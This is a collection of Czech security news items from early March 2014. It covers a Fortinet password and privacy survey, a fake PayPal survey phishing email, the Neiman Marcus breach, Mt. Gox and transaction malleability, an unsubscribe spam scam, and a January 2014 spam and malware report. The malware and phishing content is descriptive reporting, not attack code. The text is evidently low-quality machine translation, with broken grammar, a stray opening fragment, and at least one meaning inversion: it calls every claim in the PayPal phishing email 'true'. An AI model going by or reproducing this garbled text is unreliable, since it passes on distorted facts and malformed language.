Aktualizace softwaru 1.2 je nyní k dispozici pro zákazníky FortiSandbox-3000D, a FortiSandbox-1000D se očekává, že loď ve druhém čtvrtletí tohoto roku.
Co si lidé myslí o hesla, e-mailové snooping a osobních údajů
2.3.2014 Kriminalita
Na konferenci RSA v San Franciscu, Fortinet zveřejněn nový výzkum, který ukazuje, kde milénia a Gen-Xers stát v souvislosti s hesly, on-line marketingových praktik, e-mailovou špehovat, a jejich osobních údajů. ze závěrů nezávislého US-založené průzkumu 150 založené Gen X (věk 33-48) a 150 milénia (ve věku 18-32) s 50/50 mužské / ženské rozdělení, průzkum odhalil 41% obou Millenials a Gen-X se nikdy nezmění své on-line heslo, nebo jen změnit po výzvě . Z respondentů, kteří signalizovali, že jsou ostražití o změně svá hesla, 16% (19% milénia, 13% Gen-X) je měnit jednou za měsíc, 30% (25% milénia, 35% Gen-X) nic měnit každé tři jejich měsíců a 9% (11% milénia, 7% Gen-X) změnit alespoň jednou za rok. Když se zeptal, jestli měli heslo pro přístup k jejich telefon, 57% uvedlo, že ano, zatímco 43% uvedlo, že ne. Zdá se, že Gen-X je důvěřivý v tomto ohledu, s 49% říká, že nepoužívají mobilní hesla zařízení, zatímco méně počet Millenials (37%) připustila, že nebude mít heslo na svém zařízení. Z těch, kteří se přiznal pomocí hesla na svém mobilním zařízení, nejvíce populární druh zdaleka byl jednoduchý 4-místný kód PIN (číselný heslo), přičemž na první místo na 47%. Komplexní hesla, jako jsou alfanumerické, písmen a čísel, přišel v vteřině s 26%. To bylo těsně následován vzorem (tj. trojúhelník, čtverec) na 21%. A na posledním místě byl biometrický (tj., rozpoznávání obličeje, otisků prstů) při 5%. S ohledem na to, jak respondenti zacházet hesla pro internetové účty, které používají, zdá se, mnoho z nich se zpráva, že je důležité mít různá hesla pro každý web, který vyžaduje jeden, ale je tu stále prostor pro zlepšení. 40% všech respondentů uvedlo, že mají jiné heslo pro každý účet on-line, které používají, 46% přiznat, že různá hesla pro alespoň několik stránek, které navštívíte. 7% používat různá hesla pro jejich nejcitlivější účtů a dalších 7% se používá stejné heslo pro všechny účty. hodnota osobních údajů Chcete-li určit hodnotu osobních údajů, nás požádal skupinu zařadit do pořadí podle důležitosti následující datové typy že by bylo velmi bojí, že přijdou, lékařské informace, poštovní adresa, e-mailová adresa, finanční výkazy, vzdělávací informace, číslo sociálního zabezpečení, daňová přiznání, osobní soubory, pracovní soubory, online hesla, obsah e-mailů, historie prohlížení internetu, on-line nákupu Historie a IP adresa. Jak milénia a Gen-X skupiny uvedlo, že jejich číslo sociálního zabezpečení bylo nejdůležitější údaje, které se bojí ztráty. Obě skupiny se také shodli, že on-line hesla umístila na třetím místě, pokud jde o údaje důležité. Ale to je místo, kde podobnost končí. Millennials zařadil daňové přiznání jako druhý, on-line nákup historie jako čtvrtý a obsah e-mailů jako pátý. Gen-Xers, na druhé straně, uvedlo, že jejich poštovní adresa byla druhá nejdůležitější z údajů, které bych nerad, aby ukradli. Historie procházení Internetu přišel čtvrtý a pracovních souborů přišel v páté. "Je zajímavé si povšimnout, že zatímco pracovní e-maily přišel v páté pro Gen-Xers, nepodařilo se řadí v první pětce pro Millenials," řekl John Maddison, viceprezident marketing pro Fortinet. "To je trošku o, a to zejména při porovnávání tisícileté postoje k BYOD v průzkumu, který jsme spustili v říjnu loňského roku, že našel 51% z Millenials by v rozporu s firemní politiky omezení používání vlastních zařízení, cloud storage a nositelná technologie pro práci. Celkově vzato , Millennials jsou v podstatě říká: "Nezajímá nás, co naši zaměstnavatelé říkají. Budeme používat jakémkoli zařízení, chceme, aby v práci, a pokud podniky údaje ztratí nebo zmizí, je špatné. " Email snooping Když se ptali na nedávné odhalení NSA 44% respondentů odpovědělo, že vládní agentura překročil své hranice (41% milénia a 47% z Gen-X), 20% nemá vyhraněný názor o jejich činnosti (22% z Millenials a 18% z Gen-X), 19% cítí, že vláda dělá to, co je nezbytné k ochraně našeho národa a jednají v nejlepším zájmu lidí (23% z Millenials a 15% z Gen-X), a 17% uznal, že nevědí nic o tom, co se děje s NSA (14% Millenials a 21% Gen-X). Uplatňování NSA snooping zjevení pro zaměstnavatele, jsme se zeptali na skupinu, jak by se cítili, kdyby jejich zaměstnavatel prohlédl jejich online aktivity a komunikaci. Pouze 12% uvedlo, že dělali jen to, co bylo nutné (16% Millenials a 9% Gen-X). 38% (37% milénia, 39% Gen-X) uvedlo, že byli v pohodě se sledováním, pouze pokud byly kontroly činnosti při práci pro práci. 39% z obou demografických skupin, řekl jakýkoli typ sledování firemního je mimo meze. 3% z obou skupin nemají názor a 8% (5% milénia, 11% Gen-X) nejsou jisti, jak se cítí o firemní snooping. Když se ptáme na skupinu, která z těchto on-line činností, které předpokládá, že budou soukromé; osobní e-mail, pracovní e-mail, sociální média příspěvků, textové zprávy, webové historie, umístění info, telefon audio, on-line nákup historie a něco se vztahovalo k internetu věcí (IoT), 50 +% z obou Millenials a Gen-Xers věřil, že všechny z těchto činností, s výjimkou sociálních médií příspěvků by měla být soukromá. 59 +% z obou skupin se shodli, že sociální média příspěvků by neměla mít stejný očekávání soukromí. On-line marketingové praktiky Zeptali jsme se na skupinu, která z těchto osobních kusů osobních údajů, které by byl ochoten podělit se s obchodníky (osobní e-mail, osobní telefonní číslo, poštovní adresa, přístup k sociální média účtů nebo žádný z výše uvedených. Osobní e-mailová adresa vyšel na vrcholu v 50% (53% milénia 46% Gen-X). Toto bylo následované žádný z výše na 38% ( 35%, 41% Millennials Gen-X). Osobní poštovní adresu přišel na druhé místo v 33% (31% Millennials, 35% Gen-X), která byla těsně následován osobní telefonní číslo na 26% (28%, 25 Millennials % Gen-X). A přichází na dně hromady byla sdílení přístupu k sociálním médií účtů na 9% (9% milénia, 8% Gen-X). Jak podniky se obrátit na sociální média, aby spotřebitelům, jsme se zeptali skupina o jejich nastavení sociálních médií ochrany osobních údajů. Ukazuje se, že 38% (41% milénia, 35% Gen-X) respondentů uvedlo, že používají velmi přísné nastavení ochrany osobních údajů v jejich sociálních aplikacích médií. 41% (40% milénia, 43% Gen-X) pomocí nastavení soukromí omezit pouze určité informace, 16% (15% tisícileté, 17% Gen-X) použít výchozí nastavení aplikace o ochraně osobních údajů a 5% (4% milénia, 5 % Gen-X), nepoužívejte žádné nastavení soukromí vůbec. Když se zeptal, jestli některý z respondentů vůbec starosti některé z osobních identifikačních údajů, jako je například dovolenou plány, pracovat info, atd., by mohly být sdíleny nebo použít proti nim, 28% (27% milénia, 28% Gen-X) řekl, že se obává, 18% (25% milénia, 11% Gen-X), jsou jen starosti, pokud byla informace sdílena s obchodníky, 19% (21% milénia, 17% Gen-X), řekl, že to není strach vůbec, 30% (23% milénia, 37% Gen-X) uvedlo, že nemají své osobní údaje, zatímco 5% (3% milénia, 7% Gen -X), nevím, jak se cítí o to.
Dejte si pozor na falešné PayPal "Survey Program" nabídek
2.3.2014 Bezpečnost
Uživatelé PayPal založené ve Velké Británii jsou zaměřeny s falešnou PayPal e-mailu nabízí odměnu za účast v "novém programu zjišťování," varuje Malwarebytes. "Průzkum bude trvat 5 minut a za vaše úsilí a pochopení PayPal vybere většina zákazníků že se tento průzkum a odměnou jim s 25,00 libry GBP. Bylo by užitečné, kdyby si to vyplnit hned teď. Není-li to možné, udělejte to brzy, "říká e-mailu. "Chcete-li spustit dokončení průzkumu stáhněte si attachement formulář a postupujte podle pokynů k otevření zabezpečené okno prohlížeče PayPal bonusový kód je PP2553455;.. Prosím, zkopírujte / vložte kód a napsat kód v souboru zjišťování, aby si váš 25,00 liber GBP cenu " připojené online_form.zip souboru obsahuje HTM stránky s on-line formuláře, které mají být vyplněna Existuje několik otázek k zodpovězení týkající se kvality služby PayPal, a pak oběti jsou vyzýváni, aby se podělili o své jméno, adresu, datum narození, a úplného zaplacení. informace na kartě SIM. "Z bezpečnostních důvodů doporučujeme, abyste zavřete prohlížeč po dokončení úvěrového procesu," říká pod formulářem. "Váš účet bude připsán během následujících 3 pracovních dnů." Bohužel pro ty, kteří spadají pro tento trik, každé tvrzení v tomto e-mailu je pravda, a oni budou pravděpodobně hit s poplatky za neoprávněné karty a / nebo pokusů o krádeže identity. PayPal je jeden z nejvíce využívaných značek podle phisherů, protože jeho výplata zpracování povahy. Uživatelům se doporučuje být velmi opatrní, když přezkoumává e-mail zřejmě poslal službou.
Podrobnosti o Neiman Marcus porušení odhalily
2.3.2014 Kriminalita
Porušení Neiman Marcus není tak zlé, jak se dříve věřilo, protože počet potenciálně zasažených karet se snížil z 1,1 milionu na přibližně 350.000. "počet se snížil, protože šetřením bylo zjištěno, že malware nebyl v provozu ve všech našich prodejnách, ani Každý den je v provozu v těch postižených obchodech, během červenec 16-30.října období, " sdílené Neiman Marcus generální ředitel Karen Katz. Forenzní šetření bylo zjištěno, že malware byl v provozu na 77 z 85 prodejen obchodníka, ale ne každý během výše uvedeného období se zaregistrujte nebo každý den. "Ze 350 tisíc platebních karet, které mohou být ovlivněny malware v našem systému , Visa, MasterCard a Discover oznámily nám k dnešnímu dni, že přibližně 9200 z nich byly následně použity podvodně jinde, "dodala, a také nezapomeňte zdůraznit, že čísla sociálního zabezpečení, data narození a čísla PIN nebyla ohrožena, a to on-line zákazníky nebyly ovlivněny, o které se porušení. Do té doby, BusinessWeek reportéři mají přezkoumat zprávu o porušení sestaveného poradenská firma Protiviti na 157-stránkový, a ukázal, že:
Útočníci jsou pravděpodobně ti, kteří porušili cíl, protože psal specifický kód ohrozit síť Neiman Marcus
Dali malware název podobný platební software společnosti tak, že když bude přezkoumáno přihlásí na ochranu koncových bodů, záznamy vázané k němu nebude vystupovat
Malware spustil bezpečnostní systémy společnosti na téměř 60.000 příležitostech, ale to nebyla označena jako takový a odstranit, a systém se automaticky blokovat podezřelé aktivity, jako je zejména funkce byla vypnuta, aby nedošlo k bránit údržbu systému
Konstrukce POS systém umožnil útočníkům se na prodejce, aby znovu načíst malware na počtu registrů rychle poté, co bylo zrušeno na konci každého dne
Útočníci ohrožena POS systém formou internetového směřujících citlivými server připojený k němu
Společnost byla v souladu s normami pro ochranu údajů transakcí.
Password Manager Pro každého SAML podpory 2.0
2.3.2014 Bezpečnost
ManageEngine byla přidána podpora SAML 2.0 Password Manager Pro. Tento krok posiluje mechanismus autentizace uživatele v Password Manager Pro, který umožňuje integraci s federované řešení správy identit pro single sign-on.
Podniky - velké i malé - jsou nyní přijímá federované Single Sign-On řešení, jako je Okta nabídnout bezproblémové ověřování pro uživatele a odvodit přínosy, včetně automatického poskytování a de-provisioning účtů a umožňuje uživatelům mít pohodlí pomocí stejná pověření pro on-premise a cloud aplikací. K dosažení tohoto cíle, nejnovější verze Password Manager Pro (sestavení 7002, beta), podporuje integraci s SAML, otevřený standard datového formátu XML-based pro výměnu autentizačních a autorizačních dat mezi stranami, zejména mezi poskytovatelem identity a poskytovatelem služeb . Technicky Password Manager Pro se chová jako poskytovatele SAML služeb, a to integruje s poskytovateli SAML identity. Out-of-the-box integrace je nyní k dispozici s Okta. Integrace pomáhá pákovému efektu (Okta) ověřování poskytovatele identity pro přístup Password Manager Pro. Uživatelé, kteří nasazují Okta, nebo jiný poskytovatel SAML identity mohou automaticky přihlásit do Password Manager Pro aplikace z uživatelského rozhraní příslušného identitu poskytovatele bez napájení pověření. Kromě toho na podporu pro SAML integrace, nejnovější vylepšení Password Manager Pro jsou bezpečné, SSH / Telnet přístup ke vzdáleným zařízením v datových centrech prostřednictvím poskytování, abyste nastavili skok serverů a MSP vydání, průmyslem první řešení vyvinuté speciálně pro řešení jedinečné privilegované výzvy pro správu identit, kterým čelí (MSPs). Password Manager Pro slouží jako centralizovaném vaultu pro všechny podnikové hesla a pomáhá kontrolovat přístup k IT zdrojů na základě pracovních rolí a odpovědností. Bezpečné, spolehlivé a velmi silné autentizační mechanismus je nezbytný pro produkt tohoto druhu, která je držitelem vysoce citlivých podnikových dat. Password Manager Pro již podporuje řadu on-premise autentizačních systémů, včetně možnosti pákového účinku mechanismus autentizace vnější identity obchody, jako je Active Directory, LDAP, RADIUS a dobrou řadu druhý faktor volby.
Budoucnost Bitcoin po Mt. GOX Incident
1.3.2014 Kriminalita
Není pochyb o tom, že to byl šílený týden pro každého, kdo alespoň vzdáleně zajímá o Bitcoin. Mt. GOX, kdysi největší Bitcoin trhu tam, je vypnout , a tím i hořký konec na situaci téměř měsíc trvající, ve kterém byly všechny výběry zastavil z důvodu " technických problémů ".
Mt. GOX BTC vývoj cen v únoru 2014 zdroj: Clark Moody
Jako zákazníci byli schopni přesouvat své prostředky z Mt. GOX, světově nejznámější výměnu v podstatě se stal izolovaný od zbytku Bitcoin ekosystému, což cenu Bitcoin obchodovaných na Mt. GOX klesnout na tak nízké, jak $ 100 za 1 BTC, než výměna šla zcela v režimu offline.
V naší predikci na 2014, my jsme říkal, že útoky na Bitcoin , konkrétně útoky na Bitcoin bazény, výměny a uživatelé Bitcoin se stane jedním z nejvíce vysoce postavených témat roku . Tyto útoky budou obzvláště populární s podvodníky, protože jejich poměr nákladů a výnosů je velmi příznivá .
Zatímco Mt. GOX událost může být nejvýraznější v Bitcoin historii to-data, protože se říká, že stojí za 744.408 Bitcoins, nebo více než 300 milionů dolarů na současných cenách výhodných podmínek, jediná otázka, která zůstává nezodpovězena, je, co vlastně způsobilo.
TX tvárnost, krátký pro transakce tvárnosti, je známý problém v protokolu Bitcoin. Za určitých okolností to může umožnit útočníkovi vydávat různé podpisy (nebo TX ID) pro stejné transakce, v podstatě dělat to jeví jako transakce nestalo. To může umožnit škodlivý zákazník výměny požadovat více výběry Bitcoin stejných mincí tvrzením transakce nikdy prošli.
Tento typ TX tvárnost útoku byl oficiální důvod uvádějí Mt. GOX, když se rozhodli zastavit výběry, takže se zdá, jako by se staly oběťmi kybernetické loupež, ale možnost tento incident je zevnitř nelze vyloučit.
Transakce tvárnost útok nemusí nutně zahrnovat zasvěcených, když někdo s přímým přístupem do transakčního systému může dělat to mnohem snadněji. Je samozřejmě možné, že útok bylo provedeno výhradně z vnějšku, i když v tomto případě Mt. GOX by měli mít úplné informace o osobě odpovědné za útok, prostě proto, že bych se znovu žádá o finanční prostředky znovu a znovu, citovat síťové chyby a skutečnost, že odstoupení od smlouvy nebyla přijata.
Jediné, co zbývá udělat, je právě teď čekat na orgány činné v trestním řízení až do konce jejich vyšetřování incidentu a doufám, že Mt. GOX a další zúčastněné strany spolupracují s LEA identifikovat ty odpovědné, a pokusit se obnovit škody.
Pokud jde o to, co to znamená pro budoucnost Bitcoin - tento týden nám opět ukázal, a více než kdy jindy, že Bitcoin ekosystém skutečně potřebuje firem, které chápou bezpečnost. Být decentralizované měny, žádný orgán uložit normy a bezpečnostní předpisy, takže je to na nás, Bitcoin nadšence a celé crypto-měny Společenství, s cílem zvýšit laťku: výběrem pracovat pouze s Bitcoin společnostmi, které mají neposkvrněné traťový rekord, dobrou znalost technologie zapojené a zejména požadované jistoty, ale co je nejdůležitější ochota vždy udržet inovace, aby vždy jít extra mile získat důvěru zákazníků. Udělejme to stalo a Bitcoin bude v pohodě!
Jste si jisti, že chcete odhlásit z našich pošty?
1.3.2014 Spam
Spammeři jsou neúnavní ve svých pokusech obejít anti-spamové filtry a matou příjemce spamu. Nedávno jsme zjistil hromadnou korespondenci se tváří jako automatickou odpověď na žádost odhlásit z novinek blogu. Autoři poznamenat jejich lítost nad ztrátou jednoho z jejich účastníků a zeptal se, jestli uživatel opravdu chce odhlásit.
Fráze jako "Litujeme, že jste se rozhodli pro odhlášení", se skutečně vyskytují v odpovědích odesílaných následující požadavky odhlásit. Nicméně, tam následoval nějaký neobvyklý text, ve kterém odesílatel také s lítostí informovat příjemce, že oni také odhlášen ho z jiných informačních zásilek na témata, jako jsou:
Řidičské průkazy bez osvědčení zdravotní způsobilosti
Konkurzní řízení pro právnické osoby
Bankovní licence
Zakládání podniků v zahraničí
Nemovitost s 50% slevou
Toto jsou typické spam témata, která, v tomto případě, jak bylo maskované informačních bloků. Proč jsou zprávy tak podezřívavý? Vzhledem k tomu, že odesílatel ani zmiňovat název blogu, webu nebo časopisu, ze kterého se uživatel měl mít odhlášení.
Název odhlášení služby nebylo v názvu domény odesílatele buď - adresa obsahuje pouze jednu větu, která se překládá jako "řidičský průkaz právě teď" (spammeři často používají slova související s tématem zprávy v nových oblastech), a zprávy byly zaslány v měsíci doména byla vytvořena. Nebyly zjištěny žádné odkazy na prodlužují předplatné. Vypadá to, že spammeři mysleli, že všechny zúčastněné uživatelé by odpovědět na zprávu a přijmout celou řadu nevyžádané pošty související se zvoleným tématem.
Ještě drzý poštovní uvedl, že pro určité množství peněz, spammeři by se říct, příjemce, jak zjistila jeho / její e-mailovou adresu a důvod, proč e-mailové schránky je plný spamových zpráv. Informace stojí jen 3,50 dolarů. Aby mohl zaplatit za informace, uživatel musel kliknout na odkaz na konci zprávy.
Odkaz vede na místě zvaném Konec Spam, kde uživatel může prohlédnout kompletní ceník. Například, uživatel by mohl odstranit jeho / její e-mailovou adresu spam e-mailové konference pro 1,50 dolarů platby přes PayPal. Informace o tom, jak spammeři dozvěděli o e-mailovou adresu uživatele, stojí 3,50 dolarů. Podvodníci připomněl uživateli uvést svou e-mailovou adresu, takže oni "vědí jaký e-mailovou adresu, na odhlášení".
Všechny odkazy vedly na stránku PayPal se set platební dokumentu. Pokud uživatel již registrován v systému PayPal, on / ona prostě musela stiskněte tlačítko "Kup teď" a přenést jeho / její peníze na bůh ví kde.
Samozřejmě, že to je nepravděpodobné, že by zastavit spam maily - to je těžké uvěřit, že odesílatel znát všechny spammery na světě a může zastavit jejich poštovní zásilky na žádost uživatele. Kromě toho, po převodu peněz, proud nevyžádané korespondence může dokonce zvýšit po adresa je potvrzen jako platný a naivita uživatele je známý. V nejhorším případě by mohly být použity osobní údaje uživatele před platbou na převod peněz.
Zpráva Spam: leden 2014
1.3.2014 Analýza | Spam
Spam v centru pozornosti
V lednu byla spammeři měnit jejich pozornost od Vánoc a Nového roku se na den svatého Valentýna. Angličtina-a ruskojazyčných hromadné e-maily, které nabízejí kamerové systémy byly ještě další populární trend v lednu.
Takzvané nigerijské podvodníci i nadále využívat smrt Nelsona Mandely a Ariela Šarona, aby přimět uživatele k rozdávání své peníze.
Dovolená spam
S hlavními zimní dovolená přes spammery zapnutý svou pozornost na nadcházející události, a zejména na Valentýna. Stejně jako tradiční "květinové" korespondence a návrhy na romantickou večeři nebo výlet, anglický-jazyk spam obsažen inzeráty, které nabízejí některé poněkud neobvyklé dárky, včetně skutečné hvězdy na obloze.
V únoru, očekáváme růst nejen ve sváteční motivy spam, ale také v hromadné korespondenci na dalších témat. Kromě toho očekáváme nárůst počtu zásilek využívajících téma den svatého Patrika.
V "nigerijské" manželky Nelson Mandela
Tragické události posledních měsíců jsou aktivně využívány "nigerijské" podvodníky ve svých podvodných e-mailů. Na začátku ledna, bývalý izraelský premiér Ariel Šaron zemřel ao týden později jsme zaznamenali hromadnou korespondenci využívání zprávy. Nicméně, smrt Nelsona Mandely byl využíván v mnohem větší míře. První zásilky, kde je smrt bývalého jihoafrického prezidenta se objevila v prosinci.
V lednu, jak se očekávalo, nové e-maily se objevily. Je dobře známým faktem, že Nelson Mandela byl ženatý třikrát, a to bylo něco, co spammeři vyzvednout na. Tentokrát se aktivně používají jména svých manželek přesvědčit příjemce, že jejich příběhy jsou pravdivé.
Jeden "nigerijské" dopis údajně napsal právník po zesnulém prezidentovi druhá manželka Winnie Madikizela neobsahovaly žádné podrobnosti spolupráce. Je pouze uvedeno, že Winnie a její právník potřebuje pomoc při získávání obrovské množství peněz a zlatých prutů a investovat jej. Oni tvrdili, že hledali slušný člověk, který musel být cizí státní příslušník. Pro zpětnou vazbu a více informací e-mail zadali číslo mobilního telefonu. Pozoruhodné je, že podvodníci požádal příjemce kontaktovat a to i v případě, že nabídka nebyla zájmu k němu s tím, že v takovém případě by se hledat pomoc od někoho jiného. Podvodníci samozřejmě počítal chamtivost příjemce je větší, než je jejich zdravý rozum.
Ještě další hromadné korespondence byl údajně od Mandely třetí manželka Graca maršála. Tentokrát se podvodníci pokusili vyhrát sympatie příjemce se smutným příběhem o boji uvnitř Nelsona Mandely rodiny pro jeho miliony a o dalších chamtivých příbuzných, schopných čehokoliv. Pro potvrzení příběh e-maily obsahovaly odkaz na článek zpravodajství v renomovaných novinách. Podvodníci byli požádáni o pomoc při přenášení peníze z "nešťastného manželka prezidenta" a udržet ji v bezpečí na účet příjemce.
Video monitorovací systémy
V lednu byla nárůst ve výši hromadnou korespondenci s nabídkami na nákup a instalaci kamerové systémy na soukromých a komerčních prostor. Takové nabídky jsou poměrně typická. V podstatě, oni jsou nevyžádané e-maily psané na zastoupení různých firem specializujících se na video monitorovacích systémech. Je pravidlem, že tyto e-maily nezadáte název společnosti na adresu odesílatele. Místo, adresa obsahuje jméno nebo příjmení odesílatele, které není vždy stejný název správce ve zprávě.
Anglická jazyková spam na toto téma se zaměřením na osobní bezpečnost a možnost dohlédněte na manžely a manželky, stejně jako zdraví návštěvníků a dělníků v soukromých domech. Zprávy často obsahovaly odkaz na stránkách dodavatele nebo on-line prodejna Kamery místo a kontaktní telefonní číslo.
Zeměpisné rozložení zdrojů spamu
Podíl nevyžádané pošty v e-mailovém provozu
Podíl nevyžádané pošty v e-mailovém provozu
První týden roku 2014 došlo k mírnému poklesu podílu spamu způsobené poklesem spammer aktivity během prázdnin. Nicméně, druhý týden v lednu vynahradil toto: počet spamových zásilek výrazně zvýšil. V druhé polovině měsíce se situace normalizovala a průměr leden představovaly 65,7% všech e-mailového provozu.
Zdroje Spam
V lednu, seznam zdrojů distribuci spamu na celém světě prošla několika změnami.
Zdroje spamu podle země
USA posunul z druhého do prvního místa v kvalifikaci po rozdělení 21,9% veškeré nevyžádané pošty, což představuje nárůst o 3 procentní body. Naproti tomu podíl Číny (16%) se snížil o 7 procentních bodů, což vedlo v zemi klesl na druhé místo. Jižní Korea přišla opět třetí (12,5%), i když jejich podíl rovněž poklesl o 1,5 procentního bodu.
Stejně jako v prosinci, čtvrté místo byla pořízena Tchaj-wan (6,2%), následuje Rusko s 6%. Top 10 byla zaokrouhlena Rumunskem, což představovalo 2% veškeré nevyžádané pošty odeslané na celém světě.
Mírný nárůst spammer činnosti byl zaznamenán v Itálii, kde podíl nevyžádané pošty byl 1,5%, stejně jako ve Španělsku (1%), Hong Kong (1%) a Filipíny (1,1%). Údaje o ostatních zemích zůstal stejný bez změny jejich pořadí.
Zdroje spamu v Evropě podle země
V lednu, Jižní Korea zůstala hlavním zdrojem spamu poslal do evropských uživatelů (47,2%), i když jeho podíl klesl o 5,9 procentního bodu oproti předchozímu měsíci. Příští přišel Tchaj-wan (5,8%), což byl třetí v prosinci, následované USA (-2,1 procentního bodu), v průměru o 5,3%.
Hong Kong skončil měsíc na čtvrtém místě s 3% spamu v Evropě pochází odtud. Rusko (3%) zůstal pátý, získává 0,3 procentních bodů. To je následované Španělskem (2,4%) a Itálii (2%): obě země také vykázal mírný nárůst podílu spamu poslal evropským uživatelům. Rumunsko (1,7%) dokončilo Top 10.
Čína (1,4%) klesl sedm míst a ven z lednového Top 10 jako jeho podíl klesl téměř o 2 procentní body.
Za povšimnutí stojí mírný růst spammer činnost ve Velké Británii (1,4%), v Německu (1,3%) a Francie (0,9%).
Zdroje spamu podle krajů
Asie (49%) zůstal vedoucí regionální zdroj nevyžádané pošty v lednu i přes značný pokles (-7,6 procentního bodu), v spammer činnosti. Severní Amerika přišla druhá, co rozděleny 15% světového spamu, což představuje nárůst o 2,8 procentního bodu. Mezitím, podíl východní Evropě vzrostly o 1,3 procentního bodu, v průměru o 18%, čímž se kraj na třetím místě v hodnocení. Západní Evropa (5,8%) a Latinská Amerika (4%) přišel čtvrtý a pátý, resp.
Škodlivé příloh v e-mailovém provozu
V lednu se Top 10 škodlivých programů, které se šíří prostřednictvím e-mailu byl následující:
TOP 10 škodlivých programů distribuovaných prostřednictvím e-mailu
Trojan-Spy.html.Fraud.gen zůstává nejrozšířenější škodlivý program. Fraud.gen patří do rodiny trojských koní, které používají spoofing technologie: Tyto trojské koně napodobit HTML stránky a jsou distribuovány prostřednictvím e-mailu, se objeví v podobě oznámení od velkých komerčních bank, e-obchody, vývojáři softwaru, atd.
Trojan-PSW.Win32.Fareit.amzb, Trojan-PSW.Win32.Fareit.anaq, Trojan-PSW.Win32.Fareit.annp, Trojan-PSW.Win32.Fareit.anai a Trojan-PSW.Win32.Fareit.amzs přišel druhý, třetí, čtvrtý, osmý a devátý, resp. Tyto programy patří do rodiny malware, který krade uživatelská jména a hesla a posílá je do příkazového serveru zločinců. Mohou také zahájit DDoS útoky, stáhněte a spusťte náhodné software. Všech pět vzorků stáhnout a spustit trojské koně z rodiny Zbot určený k útoku servery a počítače, jakož i pro zachycení uživatelských dat. Ačkoli Trojan je schopen různých škodlivých aktivit, to je nejvíce často používán ukrást bankovní údaje. To může také nainstalovat CryptoLocker , je škodlivý program, který vyžaduje peníze na dešifrování dat uživatele. Trojan-PSW.Win32.Fareit.anai také načte Trojan, který nainstaluje škodlivý rozšíření pro prohlížeče, který je schopen se dívat skrz žádostí o vyhledávání uživatele na hlavních vyhledávačů a výměna výsledků v zájmu zločinců. Mezi škodlivé programy z rodiny Fareit krást peněženky Bitcoin a asi 30 dalších virtuálních měn.
Páté místo obsadil čistou červa Asprox určené k šíření spamu. To automaticky infikuje weby, načte a spustí další programy, a sbírá cenné informace uložené v počítači, jako jsou hesla a další údaje pro přístup k e-mailu a FTP účtů.
Top 10 byla završena Email-Worm.Win32.Bagle.gt., E-mailový červ, který posílá kopie sebe sama všem e-mailové adresy nalezené v infikovaném počítači. Červ také stahuje soubory z internetu bez vědomí uživatele. E-mailové Worm.Win32.Bagle.gt používá svůj vlastní SMTP knihovnu poslat infikované zprávy.
Distribuce mailové antivirových odhalení podle zemí
USA (3,5 procentních bodů), na špičce hodnocení zemí s nejvyšším počtem e-mailových antiviru tlačí na Spojené království až do druhé (-3,41 procentního bodu). Německo zůstalo třetí místo s poklesem o 0,39 procentního bodu ve srovnání s předchozím měsícem.
Ruský podíl na celkovém počtu mailová antivirových odhalení celého světa byla až 2%. Akcie Mexika a Jihoafrické republiky vzrostl výrazně znamená tyto země vstoupily do Top 20 v sedmnáctém a osmnáctém míst, resp.
Zvláštnosti škodlivého spamu
Minulý měsíc se podvodníci zaměřili na uživatele cross-platformní Messenger WhatsApp, jehož obliba po celém světě rychle roste. Messenger umožňuje uživatelům posílat textové zprávy a vyměňovat obrázky a videa a zvukové soubory. Skutečnost, že WhatsApp je v současné době k dispozici pouze pro smartphony a vytvoření účtu WhatsApp nevyžaduje e-mailový účet, nezabránila zločince z rozesílání spamu upozornění e-mailem.
V lednu jsme narazili na falešné oznámení z WhatsApp, který řekl, že jeden z uživatelových přátel nebo jen "váš přítel" poslal mu fotografii nebo obrázek. Přiložený archiv vlastně obsahoval škodlivý program detekován Kaspersky Lab jako Backdoor.Win32.Androm.bjkd., Notoricky známý backdoor, jehož hlavní funkcí je ke stažení další malware v počítači oběti.
Phishing
Pořadí organizací napadeny phisherů se v lednu výrazně nezmění.
Distribuce Top 100 organizací, na něž phisherů podle kategorií
Hodnocení je založeno na společnosti Kaspersky Lab anti-phishing součástí odhalení, které jsou aktivovány pokaždé, když se uživatel pokusí klikněte na odkaz phishing, bez ohledu na to, zda je odkaz v nevyžádaných e-mailů, nebo na webové stránce.
První místo byla opět obsazena sociálních sítí (27,3%), které se zvýšily svůj podíl o 0,9 procentního bodu. Podíl e-mailových služeb (19,7%) a vyhledávačů (16,9%) mírně zvýšil a tyto kategorie zůstaly v druhém a třetím místě v žebříčku, resp.
Finanční a e-pay organizace (15,7%) zůstal na čtvrtém místě, i přes podíl kategorii je pokles o 0,2 procentního bodu ve srovnání s předchozím měsícem.
Procento telefonie a poskytovatelů internetových služeb (8.29%) a IT dodavatelů (5,93%), kategorie mírně snížil, i když to neovlivnilo jejich pořadí - oni zůstali v páté a šesté pozice, resp.
V lednu byla phishery vyslat falešné oznámení z řady populárních on-line obchodů. Příjemci podvodného e-mailu podepsaného "manažer" amerického maloobchodního řetězce Walmart byli informováni, že jejich objednávka nebyla doručena. Chcete-li vyřešit tento problém, byli požádáni, aby vyplnit formulář a odeslat ji zpět do týdne. Zpráva byla navržena v oficiální firemní styl, včetně loga společnosti a automatický podpis na úpatí zprávy - to vše mělo přesvědčit uživatele, že e-mail byl legitimní. Příjemce je však mělo být podezřelé tím, že e-mail se jimi zabývat osobně jménem a skutečnost, že se více než jeden důvod pro dodání není provedena.
V lednu jsme také narazili na německého jazyka phishing hromadnou korespondenci, která byla pomocí názvu Amazon store. Příjemce byl informován, že služba byla zaregistrována pokus o přístup ke svému účtu z počítače někoho jiného. Příjemce byl požádán, aby potvrdil informace o účtu do 48 hodin, jinak by to být blokován. E-mail obsahoval odkaz na stránku phishing. Stojí za to poznamenat, že e-mail neměl sebemenší podobnost legitimní zprávy. Zdá se, že podvodníci doufali, že příjemci byli nezkušení nebo nepozorný, při použití legitimní hledá e-mailovou adresu v poli Od.
Závěr
Podíl nevyžádané pošty v celosvětovém e-mailovém provozu se snížil o 7,6 procentního bodu a v průměru 65,7% v lednu. Jak se předpokládá, že pokles v podílu nevyžádané pošty byl kvůli klidu brzy v lednu, kdy je zde méně podnikatelské činnosti a velký počet botnetů jsou vypnuty.
Spam zásilky obsahovaly reklamy pro dary, jakož i služby, které nabízejí k pořádání různých akcí nebo výletů. Ještě jeden svátek, den svatého Valentýna, byl využíván jak v anglické a ruské jazykové spamu. Zaznamenali jsme tradiční hromadnou korespondenci z "květinových" partnerských programů reklamní romantické večeře a mnoho dalších dárkových nabídkách.
